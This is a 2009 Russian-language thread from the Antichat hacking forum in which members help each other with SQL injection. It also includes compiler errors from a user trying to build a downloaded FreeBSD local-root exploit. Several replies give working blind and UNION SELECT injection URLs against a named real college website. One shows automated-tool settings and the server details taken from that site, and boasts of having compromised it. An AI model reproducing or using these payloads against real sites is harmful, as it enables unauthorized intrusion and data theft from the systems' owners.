Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.12.2009, 07:33
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
Что-то много вопрос от меня сегодня...
Запрос вида
+union+select+1,convert(version()+using+latin1),3, 4,5,6,7,8,9,10,11,12,13,14--
Выдает ошибку
Illegal mix of collations for operation 'UNION'
Если использовать просто
+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,1 3,14--
То
Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как такое побороть?
Последний раз редактировалось hackmen; 11.12.2009 в 07:38..
|
|
|
11.12.2009, 07:46
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от hackmen
Что-то много вопрос от меня сегодня...
Запрос вида
+union+select+1,convert(version()+using+latin1),3, 4,5,6,7,8,9,10,11,12,13,14--
Выдает ошибку
Illegal mix of collations for operation 'UNION'
Если использовать просто
+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,1 3,14--
То
Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как такое побороть?
AAAAAAAAAAAAAAAA 
Уже какой раз.
AES_DECRYPT, AES_ENCRYPT!
unhex, hex.
convert.
|
|
|
|
11.12.2009, 16:53
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
компилирую етот сплойт _http://forum.antichat.ru/thread160377.html ! пишу
выдает:
Код:
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '#' token
ls.c:2:3: invalid preprocessing directive #EDB
ls.c:3:3: invalid preprocessing directive #CVE
ls.c:4:3: invalid preprocessing directive #Title
ls.c:5:3: invalid preprocessing directive #Author
ls.c:6:3: invalid preprocessing directive #Published
ls.c:7:3: invalid preprocessing directive #Download
ls.c:8:3: invalid preprocessing directive #Download
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '#' token
ls.c:10: error: syntax error before '&' token
ls.c:16: error: syntax error before "long"
ls.c:27: warning: data definition has no type or storage class
ls.c:28: error: syntax error before "r00tbox"
ls.c:28: error: syntax error at '#' token
ls.c:30: error: stray '@' in program
ls.c:31: error: `kcope' undeclared here (not in a function)
ls.c:31: error: called object is not a function
ls.c:31: error: syntax error before "gid"
ls.c:36:20: warning: multi-character character constant
ls.c:38:10: warning: character constant too long for its type
ls.c:40:10: warning: character constant too long for its type
ls.c:42:10: warning: character constant too long for its type
ls.c:43: warning: data definition has no type or storage class
ls.c:44: warning: data definition has no type or storage class
ls.c:44: error: syntax error before "value"
ls.c:45: warning: data definition has no type or storage class
ls.c:45: error: syntax error before "value"
ls.c:46: warning: data definition has no type or storage class
ls.c:46: error: syntax error before "value"
ls.c:47: warning: data definition has no type or storage class
ls.c:47: error: syntax error before "value"
ls.c:48: warning: data definition has no type or storage class
ls.c:48: error: syntax error before "value"
ls.c:50:3: invalid preprocessing directive #uname
ls.c:51: error: syntax error at '#' token
ls.c:53: error: stray '@' in program
ls.c:54: error: redefinition of 'uid'
ls.c:31: error: previous definition of 'uid' was here
ls.c:54: error: called object is not a function
ls.c:54: error: syntax error before "gid"
ls.c:55:3: invalid preprocessing directive #cat
ls.c:56:3: invalid preprocessing directive #$FreeBSD
ls.c:95:2: invalid preprocessing directive #!
In file included from /usr/include/sys/_types.h:33,
from /usr/include/stdio.h:45,
from ls.c:100:
/usr/include/machine/_types.h:75: error: syntax error before "__int_least8_t"
ls.c:113: error: syntax error before "gcc"
In file included from /usr/include/sys/types.h:44,
from /usr/include/unistd.h:41,
from ls.c:115:
/usr/include/machine/endian.h:158: error: syntax error before "static"
In file included from /usr/include/unistd.h:41,
from ls.c:115:
/usr/include/sys/types.h:64: error: syntax error before "int8_t"
In file included from ls.c:115:
/usr/include/unistd.h:329: error: conflicting types for 'execl'
/usr/include/unistd.h:329: note: a parameter list with an ellipsis can't match a
n empty parameter name list declaration
ls.c:110: error: previous implicit declaration of 'execl' was here
ls.c:126: error: syntax error before "gcc"
ls.c:127:45: too many decimal points in number
ls.c:128:11: too many decimal points in number
ls.c:128:28: too many decimal points in number
ls.c:129:6: warning: no newline at end of file
как исправить ошыбку?
спасибо
НЕПОНЯЛ ЕТО ПИСАЛ НЕ Я!!!!!!!!!!!!!!!!!!!!!^
Последний раз редактировалось 547; 11.12.2009 в 17:34..
|
|
|
|
11.12.2009, 17:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от hackmen
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Как правильно сказал Spyder - там Blind:
Код:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1+and+substring(version(),1,1)=5--+
Чтобы понять, почему именно пятая ветка, просто подставь 3, а затем 4 вместо 5 - ошибок не увидишь, увидишь разницу в тексте на странице. Которая уникальна только при 5
Тулза схавала на раз:
Код:
@@version_compile_os: Win64
database(): trccweb
@@tmpdir: C:\Windows\TEMP
version(): 5.1.35-community
user(): webuser@localhost
@@basedir: C:\Program Files\MySQL\MySQL Server 5.1\
@@datadir: C:\ProgramData\MySQL\MySQL Server 5.1\Data\
про toolza 1.0 думаю тебе рассказывать не нужно, метод GET, режим NORMAL, настройки:
Код:
$method = 0;
$bl_url = "http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "HEARTSAVER FIRST";
$bl_error_type = 1;
Нажал на кнопку и зохавал сайт
Последний раз редактировалось Pashkela; 11.12.2009 в 17:38..
|
|
|
|
11.12.2009, 17:51
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Pashkela, зачем заваливать сервер запросами? 5я же ветка.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
11.12.2009, 18:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от hackmen
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Здесь блинд, но если тебя интересует конкретно этот сайт, то там рядышком есть и обычная скуля...
Код:
http://www.trcc.cc.mo.us/display_news_photo.php?ID=-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11%23
|
|
|
|
11.12.2009, 18:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Qwazar
Pashkela, зачем заваливать сервер запросами? 5я же ветка.
обычный блайнд крутил. Чо такого. Причем здесь "5-ая ветка" и узнавание "системной информации" при блинде. Ну майлбраш нашел неслепую скулю, мололдчик. Тогда конечно уже другой расклад.
PS: Вообще-то лично я системной информации придаю большое значение, т.к. даже "@@tmpdir: C:\Windows\TEMP" лично мне о многом говорит
|
|
|
|
11.12.2009, 18:46
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от Pashkela
обычный блайнд крутил. Чо такого. Причем здесь "5-ая ветка" и узнавание "системной информации" при блинде. Ну майлбраш нашел неслепую скулю, мололдчик. Тогда конечно уже другой расклад.
PS: Вообще-то лично я системной информации придаю большое значение, т.к. даже "@@tmpdir: C:\Windows\TEMP" лично мне о многом говорит
Имеются в виду особые методы, позволяющие крутить слепую скулю почти с той же скроростью как и обычную если 5-ая ветка и вывод ошибок присутствуют
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/showpost.php?p=1494440&postcount=10
Последний раз редактировалось bons; 11.12.2009 в 18:51..
|
|
|
|
11.12.2009, 19:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 bons:
Я говорил про тулзу, насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому. Да, кое-чего в тулзе нет. Но и так бесплатно и многопоточно. Уж извините.
|
|
|
|
11.12.2009, 19:12
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Pashkela, пусть к перспективным методам привыкают  А не бездумно пользуются программами.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
